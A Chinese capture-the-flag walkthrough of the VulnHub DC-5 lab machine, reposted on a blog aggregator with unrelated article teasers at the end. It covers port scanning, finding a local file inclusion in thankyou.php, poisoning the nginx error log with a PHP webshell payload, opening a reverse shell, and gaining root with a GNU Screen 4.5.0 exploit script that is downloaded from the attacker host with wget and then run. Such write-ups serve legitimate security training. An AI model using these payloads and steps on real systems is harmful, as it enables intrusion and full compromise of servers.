[vulnhub]DC: 5

news2024/12/29 10:59:37

https://www.vulnhub.com/entry/dc-5,314/

主机发现端口扫描

  1. 探测存活主机,175是靶机

    nmap -sP 192.168.75.0/24
    Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-02 13:27 CST
    Nmap scan report for 192.168.75.1
    Host is up (0.00022s latency).
    MAC Address: 00:50:56:C0:00:08 (VMware)
    Nmap scan report for 192.168.75.2
    Host is up (0.00018s latency).
    MAC Address: 00:50:56:FB:CA:45 (VMware)
    Nmap scan report for 192.168.75.175
    Host is up (0.00016s latency).
    MAC Address: 00:0C:29:BF:7F:5F (VMware)
    Nmap scan report for 192.168.75.254
    Host is up (0.00015s latency).
    MAC Address: 00:50:56:FE:CA:7A (VMware)
    Nmap scan report for 192.168.75.151
    Host is up.
    
  2. 扫描靶机所有开放端口

    nmap -sT -min-rate 10000 -p- 192.168.75.175
    Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-02 13:28 CST
    Nmap scan report for 192.168.75.175
    Host is up (0.00040s latency).
    Not shown: 65532 closed tcp ports (conn-refused)
    PORT      STATE SERVICE
    80/tcp    open  http
    111/tcp   open  rpcbind
    57203/tcp open  unknown
    MAC Address: 00:0C:29:BF:7F:5F (VMware)
    
  3. 扫描服务版本及系统版本

    nmap -sV -sT -O -p80,111,57203 192.168.75.175
    Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-02 13:30 CST
    Nmap scan report for 192.168.75.175
    Host is up (0.00047s latency).
    
    PORT      STATE SERVICE VERSION
    80/tcp    open  http    nginx 1.6.2
    111/tcp   open  rpcbind 2-4 (RPC #100000)
    57203/tcp open  status  1 (RPC #100024)
    MAC Address: 00:0C:29:BF:7F:5F (VMware)
    Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
    Device type: general purpose
    Running: Linux 3.X|4.X
    OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
    OS details: Linux 3.2 - 4.9
    Network Distance: 1 hop
    
  4. 扫描漏洞

    nmap -script=vuln -p 80,111,57203 192.168.75.175
    Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-02 13:33 CST
    Nmap scan report for 192.168.75.175
    Host is up (0.00052s latency).
    
    PORT      STATE SERVICE
    80/tcp    open  http
    |_http-dombased-xss: Couldn't find any DOM based XSS.
    | http-csrf:
    | Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.75.175
    |   Found the following possible CSRF vulnerabilities:
    |
    |     Path: http://192.168.75.175:80/contact.php
    |     Form id: fname
    |_    Form action: thankyou.php
    |_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
    111/tcp   open  rpcbind
    57203/tcp open  unknown
    MAC Address: 00:0C:29:BF:7F:5F (VMware)
    

    没什么实质性信息,依旧是80端口开始

web渗透

  1. 访问主页

    在这里插入图片描述

  2. 扫描目录,没什么可以关注的

    dirsearch -u 192.168.75.175 -x 403
    //
    [13:40:35] Starting:
    [13:40:56] 200 -    4KB - /contact.php
    [13:40:56] 301 -  184B  - /css  ->  http://192.168.75.175/css/
    [13:41:00] 200 -    6KB - /faq.php
    [13:41:01] 200 -   17B  - /footer.php
    [13:41:03] 301 -  184B  - /images  ->  http://192.168.75.175/images/
    [13:41:25] 200 -  852B  - /thankyou.php
    
  3. 我们看官网下的小提示:这个特定的入口点可能很难识别,但它确实存在。您需要寻找一些不寻常的东西(刷新页面时会发生变化的东西),我们可以注意到每次提交footer页面的年份就会不一样

    在这里插入图片描述

    可能入口就存在页脚里

  4. 访问/footer.php ,一直刷新年份也会变,所以就是thankyou页面包含了footer.php ,可能存在参数来包含footer.php ,使用wfuzz来尝试混淆出参数

    # 尝试包含 /etc/passwd
    wfuzz -c -w /usr/share/wfuzz/wordlist/general/big.txt --hh 851 'http://192.168.75.175/thankyou.php?FUZZ=/etc/passwd'
    ********************************************************
    * Wfuzz 3.1.0 - The Web Fuzzer                         *
    ********************************************************
    
    Target: http://192.168.75.175/thankyou.php?FUZZ=/etc/passwd
    Total requests: 3024
    
    =====================================================================
    ID           Response   Lines    Word       Chars       Payload
    =====================================================================
    
    000001053:   200        70 L     104 W      2319 Ch     "file"
    
    

    混淆出参数file ,可能就是使用file 参数来包含文件的,成功包含/etc/passwd

    在这里插入图片描述

  5. 因为不存在登陆页面,所以包含了/etc/passwd文件也没用,根据CTF的思路我们尝试包含日志文件

    /thankyou.php?file=/var/log/nginx/access.log
    

    包含成功!

  6. 尝试后,UA插入php代码不成功。最后,我们可以将php代码插入到file参数后,使其发生错误,然后将该语句留在error.log

    (这里开始靶机IP改为176,之前乱搞把之前的靶机搞坏了)

    http://192.168.75.176/thankyou.php?file=<?php system($_POST['a']); ?>
    

    包含error.log ,存在&lt;?php @eval($_POST['b']); ?&gt; 即可

    2024/11/03 04:37:36 [error] 557#0: *63 FastCGI sent in stderr: "PHP message: PHP Warning:  include(&lt;?php @eval($_POST['b']); ?&gt;): failed to open stream: No such file or directory in /var/www/html/thankyou.php on line 44
    PHP message: PHP Warning:  include(): Failed opening '&lt;?php @eval($_POST['b']); ?&gt;' for inclusion (include_path='.:/usr/share/php:/usr/share/pear') in /var/www/html/thankyou.php on line 44" while reading response header from upstream, client: 192.168.75.1, server: _, request: "GET /thankyou.php?file= HTTP/1.1", upstream: "fastcgi://unix:/var/run/php5-fpm.sock:", host: "192.168.75.176", referrer: "http://192.168.75.176/thankyou.ph"
    

    使用蚁🗡连接(密码是b,取决以你的post参数),然后在蚁🗡里面启动终端然后反弹shell

    在这里插入图片描述

提权

  1. 查看权限

    (www-data:/var/www) $ whoami
    www-data
    (www-data:/var/www) $ id
    uid=33(www-data) gid=33(www-data) groups=33(www-data)
    (www-data:/var/www) $ uname -a
    Linux dc-5 3.16.0-4-amd64 #1 SMP Debian 3.16.51-2 (2017-12-03) x86_64 GNU/Linux
    
  2. 寻找敏感文件

    (www-data:/var/www) $ find / -perm -u=s -type f 2>/dev/null
    /bin/su
    /bin/mount
    /bin/umount
    /bin/screen-4.5.0
    /usr/bin/gpasswd
    /usr/bin/procmail
    /usr/bin/at
    /usr/bin/passwd
    /usr/bin/chfn
    /usr/bin/newgrp
    /usr/bin/chsh
    /usr/lib/openssh/ssh-keysign
    /usr/lib/dbus-1.0/dbus-daemon-launch-helper
    /usr/lib/eject/dmcrypt-get-device
    /usr/sbin/exim4
    /sbin/mount.nfs
    

    发现screen-4.5.0

  3. 搜索screen-4.5.0 是否存在提权漏洞

    searchsploit screen 4.5.0
    ------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
     Exploit Title                                                                                                                                   |  Path
    ------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
    GNU Screen 4.5.0 - Local Privilege Escalation                                                                                                    | linux/local/41154.sh
    GNU Screen 4.5.0 - Local Privilege Escalation (PoC)                                                                                              | linux/local/41152.txt
    ------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
    

    linux/local/41154.sh 拿去下来下载到靶机

  4. 执行脚本

    $ wget http://192.168.75.151/41154.sh
    converted 'http://192.168.75.151/41154.sh' (ANSI_X3.4-1968) -> 'http://192.168.75.151/41154.sh' (UTF-8)
    --2024-11-03 05:11:00--  http://192.168.75.151/41154.sh
    Connecting to 192.168.75.151:80... connected.
    HTTP request sent, awaiting response... 200 OK
    Length: 1149 (1.1K) [application/x-sh]
    Saving to: '41154.sh'
    
    41154.sh            100%[=====================>]   1.12K  --.-KB/s   in 0s
    
    2024-11-03 05:11:00 (8.86 MB/s) - '41154.sh' saved [1149/1149]
    //
    $ chmod u+x 41154.sh
    //
    $ ./41154.sh
    ~ gnu/screenroot ~
    [+] First, we create our shell and library...
    [+] Now we create our /etc/ld.so.preload file...
    [+] Triggering...
    ' from /etc/ld.so.preload cannot be preloaded (cannot open shared object file): ignored.
    [+] done!
    No Sockets found in /tmp/screens/S-www-data.
    
    # id
    id
    uid=0(root) gid=0(root) groups=0(root),33(www-data)
    # whoiam
    whoiam
    sh: 2: whoiam: not found
    # whoami
    whoami
    root
    

    提权成功,读取flag文件

    # cat thisistheflag.txt
    cat thisistheflag.txt
    
    888b    888 d8b                                                      888      888 888 888
    8888b   888 Y8P                                                      888      888 888 888
    88888b  888                                                          888      888 888 888
    888Y88b 888 888  .d8888b .d88b.       888  888  888  .d88b.  888d888 888  888 888 888 888
    888 Y88b888 888 d88P"   d8P  Y8b      888  888  888 d88""88b 888P"   888 .88P 888 888 888
    888  Y88888 888 888     88888888      888  888  888 888  888 888     888888K  Y8P Y8P Y8P
    888   Y8888 888 Y88b.   Y8b.          Y88b 888 d88P Y88..88P 888     888 "88b  "   "   "
    888    Y888 888  "Y8888P "Y8888        "Y8888888P"   "Y88P"  888     888  888 888 888 888
    
    Once again, a big thanks to all those who do these little challenges,
    and especially all those who give me feedback - again, it's all greatly
    appreciated.  :-)
    
    I also want to send a big thanks to all those who find the vulnerabilities
    and create the exploits that make these challenges possible.
    
    

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/2231183.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

C语言_数据结构_顺序表

1. 本章重点 顺序表初始化顺序表尾插顺序表尾删顺序表头插顺序表头删顺序表查找顺序表在pos位置插入x顺序表删除pos位置的值顺序表销毁顺序表打印 2. 顺序表的概念及结构 顺序表是用一段物理地址连续的存储单元依次存储数据元素的线性结构&#xff0c;一般情况下采用数组存储…

形态学操作篇 原理公式代码齐活

一、腐蚀 腐蚀操作的核心原理是利用一个结构元素在图像上进行扫描&#xff0c;判断结构元素所覆盖的区域与前景像素的关系。如果结构元素完全被包含在前景像素区域内&#xff0c;那么结构元素中心对应的像素位置在腐蚀后的图像中被标记为前景像素&#xff1b;如果结构元素不完…

小北的字节跳动青训营与 LangChain 实战课:探索 AI 技术的新边界(持续更新中~~~)

前言 最近&#xff0c;字节跳动的青训营再次扬帆起航&#xff0c;作为第二次参与其中的小北&#xff0c;深感荣幸能借此机会为那些尚未了解青训营的友友们带来一些详细介绍。青训营不仅是一个技术学习与成长的摇篮&#xff0c;更是一个连接未来与梦想的桥梁~ 小北的青训营 X M…

【SSM详细教程】-15-Spring Restful风格【无敌详细】

精品专题&#xff1a; 01.《C语言从不挂科到高绩点》课程详细笔记 https://blog.csdn.net/yueyehuguang/category_12753294.html?spm1001.2014.3001.5482 02. 《SpringBoot详细教程》课程详细笔记 https://blog.csdn.net/yueyehuguang/category_12789841.html?spm1001.20…

使用Python爬取某发地网市场蔬菜价格数据

前言 随着互联网技术的发展&#xff0c;数据抓取成为了获取大量公开数据的重要手段。本文将介绍如何利用 Python 编程语言结合 DrissionPage 和自定义的 DataRecorder 模块&#xff0c;实现对新发地市场蔬菜价格数据的自动化抓取&#xff0c;并将抓取到的数据保存至 CSV 文件中…

免费好用又好看且多端自动同步第三方终端工具Termius你值得拥有

使用目的&#xff1a; 本地终端功能一样&#xff0c;都是为了登录服务器查看日志等操作。 本地终端 优点&#xff1a;方便简单&#xff0c;无需额外下载安装、免费。 缺点&#xff1a;每次都需要重新登陆输入命令&#xff0c;步骤繁琐无法简化&#xff1b;不能跨端同步。 第…

Postman:高效的API测试工具

在现代软件开发中&#xff0c;前后端分离的架构越来越普遍。前端开发者与后端开发者之间的协作需要一种高效的方式来测试和验证API接口。在这个背景下&#xff0c;Postman作为一款强大的API测试工具&#xff0c;受到了广泛的关注和使用。 今天将介绍什么是Postman、为什么要使用…

计算机网络-以太网小结

前导码与帧开始分界符有什么区别? 前导码--解决帧同步/时钟同步问题 帧开始分界符-解决帧对界问题 集线器 集线器通过双绞线连接终端, 学校机房的里面就有集线器 这种方式仍然属于共享式以太网, 传播方式依然是广播 网桥: 工作特点: 1.如果转发表中存在数据接收方的端口信息…

基于Retinex算法的图像去雾matlab仿真

目录 1.算法运行效果图预览 2.算法运行软件版本 3.部分核心程序 4.算法理论概述 5.算法完整程序工程 1.算法运行效果图预览 (完整程序运行后无水印) 2.算法运行软件版本 matlab2022a 3.部分核心程序 &#xff08;完整版代码包含详细中文注释和操作步骤视频&#xff09…

Nature Medicine病理AI汇总|TORCH:预测未知原发部位癌症的肿瘤起源|顶刊精析·24-11-01

小罗碎碎念 今天分析Nature Medicine病理AI系列的第三篇文章——《Prediction of tumor origin in cancers of unknown primary origin with cytology-based deep learning》 这篇文章报道了一种基于细胞学图像的深度学习方法TORCH&#xff0c;用于预测未知原发部位癌症的肿瘤…

Ubuntu 安装CUDA, cuDNN, TensorRT(草稿)

文章目录 写在前面一、CUDA, cuDNN, TensorRT 三个库的版本的确定二、解决方法参考链接 写在前面 自己的测试环境&#xff1a; Ubuntu20.04, 本文安装的版本&#xff1a; cuda_11.1.0&#xff1b;cuDNN-8.2.1&#xff1b;TensorRT-8.2.4.2 一、CUDA, cuDNN, TensorRT 三个库…

豆包,攻克数字是个什么工具?《GKData-挖掘数据的无限可能》(数据爬虫采集工具)

豆包&#xff0c;攻克数字是个什么工具&#xff1f; “攻克数字” 指的是 “攻克数字&#xff08;GKData&#xff09;” 这样一款工具。是一款针对网页、APP中数据自动解析转表存入数据库的软件&#xff0c;为数据工作者而生。它是一个不会编程也能用的可视化数据解析为标准二…

rust编写的系统监测器

系统监测器 技术栈 rusttaurivue3vue-echartsrsbuild 软件介绍 用于查看电脑的硬件信息&#xff0c;实时监测cpu&#xff0c;内存&#xff0c;硬盘&#xff0c;网络&#xff0c;进程等系统资源 图形化&#xff0c;动态化展示&#xff0c;美观实用 软件截图 下载 https:/…

实体类中为什么要实现serializable接口

最近见到好多项目中写的代码&#xff0c;在实体类中实现了Serializable接口。说实话&#xff1a;这个在以前学习的时候&#xff0c;貌似学过&#xff0c;但是一直没有用过&#xff0c;所以看着一脸懵逼&#xff0c;但是别人总不可能随便写的吧.....所以就去查了一下这个接口。 …

github打不开网络问题

当打开github出现超时或者网络不能访问的情况时&#xff0c;我们进行如下方法解决&#xff1a; 1&#xff0c;ping gitbub.com查看域名分析的DNS IP C:\Users\86156>ping github.com 正在 Ping github.com [20.205.243.166] 具有 32 字节的数据: 来自 20.205.243.166 的回复…

基于NVIDIA NIM平台实现盲人过马路的demo(一)

前言:利用NVIDIA NIM平台提供的大模型进行编辑,通过llama-3.2-90b-vision-instruct模型进行初步的图片检测 step1: 部署大模型到本地,引用所需要的库 import os import requests import base64 import cv2 import time from datetime import datetimestep2: 观看官方使用文…

Java日志脱敏(二)——fastjson Filter + 注解 + 工具类实现

背景简介 日志脱敏 是常见的安全需求&#xff0c;最近公司也需要将这一块内容进行推进。看了一圈网上的案例&#xff0c;很少有既轻量又好用的轮子可以让我直接使用。我一直是反对过度设计的&#xff0c;而同样我认为轮子就应该是可以让人拿去直接用的。所以我准备分享两篇博客…

上海亚商投顾:沪指缩量调整 华为概念股午后爆发

上海亚商投顾前言&#xff1a;无惧大盘涨跌&#xff0c;解密龙虎榜资金&#xff0c;跟踪一线游资和机构资金动向&#xff0c;识别短期热点和强势个股。 一.市场情绪 市场全天震荡调整&#xff0c;沪指、深成指午后跌超1%&#xff0c;创业板指一度跌逾2%&#xff0c;尾盘跌幅有…

从0开始学PHP面向对象内容之(类,对象,构造/析构函数)

上期我们讲了面向对象的一些基本信息&#xff0c;这期让我们详细的了解一下 一、面向对象—类 1、PHP类的定义语法&#xff1a; <?php class className {var $var1;var $var2 "constant string";function classfunc ($arg1, $arg2) {[..]}[..] } ?>2、解…

利用Docker Compose构建微服务架构

&#x1f493; 博客主页&#xff1a;瑕疵的CSDN主页 &#x1f4dd; Gitee主页&#xff1a;瑕疵的gitee主页 ⏩ 文章专栏&#xff1a;《热点资讯》 利用Docker Compose构建微服务架构 引言 Docker Compose 简介 安装 Docker Compose 创建项目结构 编写 Dockerfile 前端 Dockerf…